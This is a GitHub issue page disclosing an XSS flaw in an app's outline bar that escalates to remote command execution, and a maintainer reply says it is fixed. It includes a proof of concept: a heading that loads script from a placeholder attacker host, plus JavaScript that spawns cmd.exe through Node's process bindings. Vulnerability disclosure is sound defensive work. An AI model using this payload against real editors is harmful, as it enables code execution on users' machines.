Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
The filtering rules on the left outline bar are not perfect. It will cause XSS,when the document has the following content, and then could raise to RCE: eg:
# 1 # \<script src=https://hacker_s_url/xss.js\>\</script\>
//xss.js 's content var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function (a, b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key + '=' + env[key]); proc.spawn({ file: 'cmd.exe', args: ['/k netplwiz'], cwd: null, windowsVerbatimArguments: false, detached: false, envPairs: env_, stdio: [{ type: 'ignore' }, { type: 'ignore' }, { type: 'ignore' }] });
could execute cmd command.
the Linux and Mac version has the same problem.
The text was updated successfully, but these errors were encountered:
Fixed in new release
Sorry, something went wrong.
No branches or pull requests
The filtering rules on the left outline bar are not perfect. It will cause XSS,when the document has the following content, and then could raise to RCE:
eg:
could execute cmd command.

the Linux and Mac version has the same problem.
The text was updated successfully, but these errors were encountered: